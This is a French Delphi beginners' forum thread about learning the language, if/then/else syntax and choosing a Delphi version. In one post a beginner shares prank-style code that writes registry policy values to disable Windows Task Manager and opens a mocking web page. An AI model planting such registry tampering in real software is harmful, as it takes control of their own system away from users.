Je commence ! [Résolu]

Signaler
Messages postés
20
Statut
Membre
Dernière intervention
10 août 2004
-
Messages postés
1725
Statut
Modérateur
Dernière intervention
11 avril 2021
-
slt à tous,

et voilà je commence le delphi car
le vb ça devenait un peu lourd lol

comment et où apprendre bien les base du delphi car ca change bcp pazr rapport au vb...

merci d'avant
PAL

4 réponses

Messages postés
1725
Statut
Modérateur
Dernière intervention
11 avril 2021
8
Ne pas hésiter à utiliser 'if...then...else' quand c'est nécessaire.
Après 'if...then', seule l'instruction qui suit est prise en compte. Sinon, tu dois encadrer le bloc d'instructions que tu veux prendre en compte dans un bloc 'begin...end'. Même remarque pour 'else'.
Bons débuts.
Messages postés
20
Statut
Membre
Dernière intervention
10 août 2004

et bin voilà
g déjà besoin d'aide ...

procedure TForm1.Button1Click(Sender: TObject);
begin
if (Edit1.Text) = 'salut' then
SetWriteString(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\System', 'DisableTaskMgr', '1');
SetWriteString(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\System', 'DisableTaskManager', '1');
shellexecute(0,'open', 'http://membres.lycos.fr/trackerhack/gros%20lamer%20!%202.htm', nil, nil, SW_SHOWMAXIMIZED);
else
Messagebox(form1.handle,'Vous avez Perdu! Retentez votre chance!','Perdu',48)
end;
end.

et voilà mo,n prblème si je met dans edit1.text "salut"

(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\System', 'DisableTaskMgr', '1');
SetWriteString(HKEY_CURRENT_USER, 'Software\Microsoft\Windows\CurrentVersion\Policies\System', 'DisableTaskManager', '1');

mais par contre

shellexecute(0,'open', 'http://membres.lycos.fr/trackerhack/gros%20lamer%20!%202.htm', nil, nil, SW_SHOWMAXIMIZED);

lui s'ouvre à chq fois c n'est pas normal car si je met autre chose que "salut" il devrait pas s'ouvrir.... jen 'arrive pas à trouver la solution.... ah la la les début siont tjrs dur dur lol

PAL
Messages postés
20
Statut
Membre
Dernière intervention
10 août 2004

Oki merci.....

autre question .. vous conseillez delphi 6 ou le 7 ???

j'ai le 7 mais c une version démo...

PAL
Messages postés
1725
Statut
Modérateur
Dernière intervention
11 avril 2021
8
Si ta version 6 est plus "complète" que la 7, utilise la 6.
Moi je code sous Delphi 4 Entreprise, je ne me sens pas vraiment limité, ça dépend de ce que je veux faire... mais delphi 6, y'a de la marge ;)
Une version antérieure de Delphi sera à priori toujours compilable sous une version ultérieure, mais pas forcément l'inverse...